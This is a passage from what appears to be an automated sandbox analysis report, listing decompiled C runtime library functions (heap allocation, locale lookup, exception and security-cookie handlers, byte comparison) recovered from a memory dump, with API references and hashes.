Part of subcall function 008614E0: __CxxThrowException@8.LIBCMT ref: 00861590
Part of subcall function 008614E0: std::exception::exception.LIBCMT ref: 008615AD
Part of subcall function 008614E0: __CxxThrowException@8.LIBCMT ref: 008615CC

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$std::exception::exception$std::ios_base::_$AddstdH_prolog3Initstd::locale::locale
String ID:
API String ID: 1946858358-0
Opcode ID: 47bf3ec4553a06f8d64a7e453d99bc3bc84c572d2d6b6ff9282ab2ac91ff8c87
Instruction ID: 2472ab67f3663d05f860c29a8e406938f053c49007f1de49615a3cee5b27a173
Opcode Fuzzy Hash: 47bf3ec4553a06f8d64a7e453d99bc3bc84c572d2d6b6ff9282ab2ac91ff8c87
Instruction Fuzzy Hash: 42F0EC312007509BE770A66DD446B5A77D8FB40374F05450EF049DB681CEB5F44087DA

Uniqueness

Uniqueness Score: -1.00%

Function 008772AC, Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E008772AC(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x888b58, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x889864;
					if( *0x889864 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00871638(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E0086AF94(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

0x008772b1
0x008772b6
0x008772d3
0x008772d8
0x008772da
0x008772dc
0x008772de
0x008772de
0x008772de
0x00000000
0x008772e6
0x008772ef
0x008772f5
0x008772f7
0x00000000
0x00000000
0x0087732b
0x0087732d
0x00000000
0x008772f9
0x008772f9
0x00877300
0x0087731e
0x00877321
0x00877323
0x00877325
0x00877325
0x00877302
0x00877303
0x00877309
0x0087730b
0x008772df
0x008772df
0x008772e1
0x008772e4
0x00000000
0x00000000
0x00000000
0x00000000
0x0087730d
0x0087730d
0x00877310
0x00877312
0x00877314
0x00877314
0x0087731a
0x0087731a
0x0087730b
0x00000000
0x008772b8
0x008772bc
0x008772bf
0x008772c2
0x00000000
0x008772c4
0x008772c9
0x008772d2
0x008772d2
0x008772c2
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0086EBB8,?,?,00000000,00000000,00000000,?,00870C04,00000001,00000214,?,0086EB6E), ref: 008772EF

Part of subcall function 0086AF94: __getptd_noexit.LIBCMT ref: 0086AF94

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 4c3b45196853406908d820c8e5be98d9846ac8f11ef9fa90be899b28f5647dbe
Instruction ID: d9617b233dccc7ae88f718ca5724391240c033474b111e4ce27888ca85aaceca
Opcode Fuzzy Hash: 4c3b45196853406908d820c8e5be98d9846ac8f11ef9fa90be899b28f5647dbe
Instruction Fuzzy Hash: B301B13121D61A9AEB29AF29DC04B6B3399FB91760F44C529FC2EDB299DB70DC40C650

Uniqueness

Uniqueness Score: -1.00%

Function 00868B39, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00868B39(intOrPtr* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* _t21;
				void* _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t29;

				_t25 = __edx;
				_push(8);
				E0086BEB0(E0087DFCD, _t21, _t26, __esi);
				_t28 = __ecx;
				 *((intOrPtr*)(_t29 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t29 - 0x10)) = 0;
				if( *((intOrPtr*)(_t29 + 0x10)) != 0) {
					 *__ecx = 0x87f40c;
					 *((intOrPtr*)(__ecx + 8)) = 0x87f320;
					 *((intOrPtr*)(_t29 - 4)) = 0;
					 *((intOrPtr*)(_t29 - 0x10)) = 1;
				}
				 *((intOrPtr*)(_t28 +  *((intOrPtr*)( *_t28 + 4)))) = 0x87f318;
				E00868AEE(_t21,  *((intOrPtr*)( *_t28 + 4)) + _t28, _t25, _t26,  *((intOrPtr*)( *_t28 + 4)) + _t28,  *((intOrPtr*)(_t29 + 8)),  *((intOrPtr*)(_t29 + 0xc))); // executed
				return E0086BF4F(_t28);
			}

0x00868b39
0x00868b39
0x00868b40
0x00868b45
0x00868b47
0x00868b4c
0x00868b52
0x00868b54
0x00868b5a
0x00868b61
0x00868b64
0x00868b64
0x00868b73
0x00868b84
0x00868b90

APIs

__EH_prolog3.LIBCMT ref: 00868B40

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 39bafadf8634758e69a874ba649bcb06e622df54a084945ae2cd3147031bbeeb
Instruction ID: b56cd8679e1ee088df7910d6a31474ca93a631e63cca8185ff7c8beea04dc9ff
Opcode Fuzzy Hash: 39bafadf8634758e69a874ba649bcb06e622df54a084945ae2cd3147031bbeeb
Instruction Fuzzy Hash: D1F01270600615CFCB20DF98C940A5EBBF0FF08304F018829E649DB352DBB1DA54CB85

Uniqueness

Uniqueness Score: -1.00%

Function 008689F3, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008689F3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _t12;
				intOrPtr* _t13;
				void* _t26;

				E0086BEB0(E0087DF73, __ebx, __edi, __esi);
				_t12 = E008615E0(__ecx, _t26 - 0x10);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E00866FE0(_t12); // executed
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				E00861210(_t26 - 0x10);
				return E0086BF4F( *((intOrPtr*)( *_t13 + 0x18))( *((intOrPtr*)(_t26 + 8)), 4));
			}

0x008689fa
0x00868a03
0x00868a08
0x00868a0d
0x00868a12
0x00868a1c
0x00868a30

APIs

__EH_prolog3.LIBCMT ref: 008689FA

Part of subcall function 008615E0: std::_Lockit::_Lockit.LIBCPMT ref: 008615F4

Part of subcall function 00866FE0: std::_Lockit::_Lockit.LIBCPMT ref: 00866FEE
Part of subcall function 00866FE0: std::_Lockit::_Lockit.LIBCPMT ref: 00867009
Part of subcall function 00866FE0: std::bad_exception::bad_exception.LIBCMT ref: 00867088
Part of subcall function 00866FE0: __CxxThrowException@8.LIBCMT ref: 00867096
Part of subcall function 00866FE0: std::_Lockit::_Lockit.LIBCPMT ref: 008670AD
Part of subcall function 00866FE0: std::locale::facet::_Facet_Register.LIBCPMT ref: 008670C7

Part of subcall function 00861210: std::_Lockit::_Lockit.LIBCPMT ref: 00861220

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID:
API String ID: 2227438316-0
Opcode ID: 39fcee3b28721015b82f243de1e5f66226e2323d1af29941a272a97a656479af
Instruction ID: e386c59489989168c1f14f89b28d6cb945345803d4b79fad9541dabd161e3cb0
Opcode Fuzzy Hash: 39fcee3b28721015b82f243de1e5f66226e2323d1af29941a272a97a656479af
Instruction Fuzzy Hash: 9EE0DFB1900204ABCF00EFF8C80AA9CB774FF10360F150905F222E72E3DF309A108A55

Uniqueness

Uniqueness Score: -1.00%

Function 00870AA2, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,00879B55,00888CF0,00000314,00000000,?,?,?,?,?,00871B72,00888CF0,Microsoft Visual C++ Runtime Library,00012010), ref: 00870AA4

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 5b9c4063a1393c2ca2f563cd2e976edb63581e6e2fd96177e791a9cfcc8c2fbb
Instruction ID: d4d6215cd7655f1dae78d07564be6a35b7b9d21d305d85407eafbe0d0c72ea16
Opcode Fuzzy Hash: 5b9c4063a1393c2ca2f563cd2e976edb63581e6e2fd96177e791a9cfcc8c2fbb
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008754E7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008754E7(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E00870F90(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E00870F90(__esi, ?str?) != 0) {
						_v8 = E0087AB20(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}

0x008754e7
0x008754ef
0x00875557
0x00875561
0x00000000
0x00875563
0x0087556a
0x0087556a
0x00000000
0x00000000
0x00000000
0x00875507
0x00875516
0x0087553c
0x00000000
0x00875518
0x0087552e
0x00875559
0x0087555c
0x00875530
0x00875530
0x00875534
0x00875534
0x0087552e
0x00875516

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00875B24,?,0086D3C3,?,000000BC,?,00000001,00000000,00000000), ref: 00875526
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00875B24,?,0086D3C3,?,000000BC,?,00000001,00000000,00000000), ref: 0087554F
GetACP.KERNEL32(?,?,00875B24,?,0086D3C3,?,000000BC,?,00000001,00000000), ref: 00875563

Strings

ACP, xrefs: 008754F6
OCP, xrefs: 00875507

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: e8a5b009293a67d6bcfcdb84251f7754f8162766380160565663bb754c85c16a
Instruction ID: fe4f3cb5391caf8fdaa3059925ad2740bc4011f7db04392d28ac082c8b0129da
Opcode Fuzzy Hash: e8a5b009293a67d6bcfcdb84251f7754f8162766380160565663bb754c85c16a
Instruction Fuzzy Hash: 10018431605A06FAEB25DB65FC09B5A77AAFF00718F208065F10DE10D9EBA0DE41C795

Uniqueness

Uniqueness Score: -1.00%

Function 0086BEA1, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0086BEA1(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x885810; // 0xef3c5e41
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x889648 = _t6;
				 *0x889644 = _t22;
				 *0x889640 = _t25;
				 *0x88963c = _t21;
				 *0x889638 = _t27;
				 *0x889634 = _t26;
				 *0x889660 = ss;
				 *0x889654 = cs;
				 *0x889630 = ds;
				 *0x88962c = es;
				 *0x889628 = fs;
				 *0x889624 = gs;
				asm("pushfd");
				_pop( *0x889658);
				 *0x88964c =  *_t31;
				 *0x889650 = _v0;
				 *0x88965c =  &_a4;
				 *0x889598 = 0x10001;
				 *0x88954c =  *0x889650;
				 *0x889540 = 0xc0000409;
				 *0x889544 = 1;
				_t12 =  *0x885810; // 0xef3c5e41
				_v812 = _t12;
				_t13 =  *0x885814; // 0x10c3a1be
				_v808 = _t13;
				 *0x889590 = IsDebuggerPresent();
				_push(1);
				E008780D5(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x880ee4);
				if( *0x889590 == 0) {
					_push(1);
					E008780D5(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0086bea1
0x0086bea1
0x0086bea1
0x0086bea1
0x0086bea1
0x0086bea1
0x0086bea1
0x0086bea7
0x0086bea9
0x0086bea9
0x00872d37
0x00872d3c
0x00872d42
0x00872d48
0x00872d4e
0x00872d54
0x00872d5a
0x00872d61
0x00872d68
0x00872d6f
0x00872d76
0x00872d7d
0x00872d84
0x00872d85
0x00872d8e
0x00872d96
0x00872d9e
0x00872da9
0x00872db8
0x00872dbd
0x00872dc7
0x00872dd1
0x00872dd6
0x00872ddc
0x00872de1
0x00872ded
0x00872df2
0x00872df4
0x00872dfc
0x00872e07
0x00872e14
0x00872e16
0x00872e18
0x00872e1d
0x00872e31

APIs

IsDebuggerPresent.KERNEL32 ref: 00872DE7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00872DFC
UnhandledExceptionFilter.KERNEL32(00880EE4), ref: 00872E07
GetCurrentProcess.KERNEL32(C0000409), ref: 00872E23
TerminateProcess.KERNEL32(00000000), ref: 00872E2A

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 3e21611be7fd89cf877ac0e7b1c731ca4c7a9be2454cc103f1e37a4e3950213d
Instruction ID: f0b6ad59f798a76ea7420a818e3c7d35cd1a4d849a403f2600ea4343cdc04606
Opcode Fuzzy Hash: 3e21611be7fd89cf877ac0e7b1c731ca4c7a9be2454cc103f1e37a4e3950213d
Instruction Fuzzy Hash: 8021FAB8851208CFC711DF6DFC896A43BE0FB28300F18402AE989C3362E7B49884CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00871C5F, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00871C5F() {

				SetUnhandledExceptionFilter(E00871C1D);
				return 0;
			}

0x00871c64
0x00871c6c

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00011C1D), ref: 00871C64

Memory Dump Source

Source File: 00000000.00000002.238704675.0000000000861000.00000020.00020000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.238701690.0000000000860000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238716910.000000000087F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.238721704.0000000000885000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.238724265.0000000000886000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.238728449.000000000088C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7066fa287feba384c31dd67ab2c2aaf50203e5bab44001ca0fd448f1955cefe0
Instruction ID: d2fba50e6d983a07f5d4fdd550e1935c989dcf932c528f5314f42ed5502c8d0a
Opcode Fuzzy Hash: 7066fa287feba384c31dd67ab2c2aaf50203e5bab44001ca0fd448f1955cefe0
Instruction Fuzzy Hash: 649002E02D150146CE0117B55C0D45565D0BB88612B524470612DD4A5EEB54C0C46951

Uniqueness

Uniqueness Score: -1.00%

Function 00876BF0, Relevance: .4, Instructions: 355
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00876BF0(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t205;
				signed char _t206;
				signed char _t207;
				signed char _t209;
				signed char _t210;
				signed int _t215;
				signed int _t291;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t333;
				void* _t335;
				void* _t337;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t291 = 0;
					L17:
					if(_t291 != 0) {
						goto L1;
					}
					_t205 =  *(_t196 - 0x1b);
					if(_t205 ==  *(_t200 - 0x1b)) {
						_t291 = 0;
						L28:
						if(_t291 != 0) {
							goto L1;
						}
						_t206 =  *(_t196 - 0x17);
						if(_t206 ==  *(_t200 - 0x17)) {
							_t291 = 0;
							L39:
							if(_t291 != 0) {
								goto L1;
							}
							_t207 =  *(_t196 - 0x13);
							if(_t207 ==  *(_t200 - 0x13)) {
								_t291 = 0;
								L50:
								if(_t291 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t291 = 0;
									L61:
									if(_t291 != 0) {
										goto L1;
									}
									_t209 =  *(_t196 - 0xb);
									if(_t209 ==  *(_t200 - 0xb)) {
										_t291 = 0;
										L72:
										if(_t291 != 0) {
											goto L1;
										}
										_t210 =  *(_t196 - 7);
										if(_t210 ==  *(_t200 - 7)) {
											_t291 = 0;
											L83:
											if(_t291 != 0) {
												goto L1;
											}
											_t294 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t294 == 0) {
												L5:
												_t296 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t296 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t8 = (0 | _t197 > 0x00000000) - 1; // -1
														_t197 = (_t197 > 0) + _t8;
													}
													L2:
													return _t197;
												}
												_t215 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												if(_t215 != 0) {
													L86:
													_t197 = _t215;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t215 = (0 | _t294 > 0x00000000) + (0 | _t294 > 0x00000000) - 1;
											if(_t215 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t298 = (_t210 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t298 == 0) {
											L76:
											_t300 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t300 == 0) {
												L78:
												_t302 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t302 == 0) {
													L80:
													_t291 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t291 != 0) {
														_t189 = (0 | _t291 > 0x00000000) - 1; // -1
														_t291 = (_t291 > 0) + _t189;
													}
													goto L83;
												}
												_t183 = (0 | _t302 > 0x00000000) - 1; // -1
												_t291 = (_t302 > 0) + _t183;
												if(_t291 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t177 = (0 | _t300 > 0x00000000) - 1; // -1
											_t291 = (_t300 > 0) + _t177;
											if(_t291 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t171 = (0 | _t298 > 0x00000000) - 1; // -1
										_t291 = (_t298 > 0) + _t171;
										if(_t291 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t305 = (_t209 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t305 == 0) {
										L65:
										_t307 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t307 == 0) {
											L67:
											_t309 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t309 == 0) {
												L69:
												_t291 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t291 != 0) {
													_t164 = (0 | _t291 > 0x00000000) - 1; // -1
													_t291 = (_t291 > 0) + _t164;
												}
												goto L72;
											}
											_t158 = (0 | _t309 > 0x00000000) - 1; // -1
											_t291 = (_t309 > 0) + _t158;
											if(_t291 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t152 = (0 | _t307 > 0x00000000) - 1; // -1
										_t291 = (_t307 > 0) + _t152;
										if(_t291 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t146 = (0 | _t305 > 0x00000000) - 1; // -1
									_t291 = (_t305 > 0) + _t146;
									if(_t291 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t312 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L54:
									_t314 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L56:
										_t316 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L58:
											_t291 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t291 != 0) {
												_t139 = (0 | _t291 > 0x00000000) - 1; // -1
												_t291 = (_t291 > 0) + _t139;
											}
											goto L61;
										}
										_t133 = (0 | _t316 > 0x00000000) - 1; // -1
										_t291 = (_t316 > 0) + _t133;
										if(_t291 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t127 = (0 | _t314 > 0x00000000) - 1; // -1
									_t291 = (_t314 > 0) + _t127;
									if(_t291 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t121 = (0 | _t312 > 0x00000000) - 1; // -1
								_t291 = (_t312 > 0) + _t121;
								if(_t291 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t319 = (_t207 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L43:
								_t321 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L45:
									_t323 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L47:
										_t291 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t291 != 0) {
											_t113 = (0 | _t291 > 0x00000000) - 1; // -1
											_t291 = (_t291 > 0) + _t113;
										}
										goto L50;
									}
									_t107 = (0 | _t323 > 0x00000000) - 1; // -1
									_t291 = (_t323 > 0) + _t107;
									if(_t291 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t101 = (0 | _t321 > 0x00000000) - 1; // -1
								_t291 = (_t321 > 0) + _t101;
								if(_t291 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t95 = (0 | _t319 > 0x00000000) - 1; // -1
							_t291 = (_t319 > 0) + _t95;
							if(_t291 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t326 = (_t206 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t326 == 0) {
							L32:
							_t328 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t328 == 0) {
								L34:
								_t330 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t330 == 0) {
									L36:
									_t291 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t291 != 0) {
										_t88 = (0 | _t291 > 0x00000000) - 1; // -1
										_t291 = (_t291 > 0) + _t88;
									}
									goto L39;
								}
								_t82 = (0 | _t330 > 0x00000000) - 1; // -1
								_t291 = (_t330 > 0) + _t82;
								if(_t291 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t76 = (0 | _t328 > 0x00000000) - 1; // -1
							_t291 = (_t328 > 0) + _t76;
							if(_t291 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t70 = (0 | _t326 > 0x00000000) - 1; // -1
						_t291 = (_t326 > 0) + _t70;
						if(_t291 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t333 = (_t205 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t333 == 0) {
						L21:
						_t335 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t335 == 0) {
							L23:
							_t337 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t337 == 0) {
								L25:
								_t291 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t291 != 0) {
									_t63 = (0 | _t291 > 0x00000000) - 1; // -1
									_t291 = (_t291 > 0) + _t63;
								}
								goto L28;
							}
							_t57 = (0 | _t337 > 0x00000000) - 1; // -1
							_t291 = (_t337 > 0) + _t57;
							if(_t291 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t51 = (0 | _t335 > 0x00000000) - 1; // -1
						_t291 = (_t335 > 0) + _t51;
						if(_t291 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t45 = (0 | _t333 > 0x00000000) - 1; // -1
					_t291 = (_t333 > 0) + _t45;
					if(_t291 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
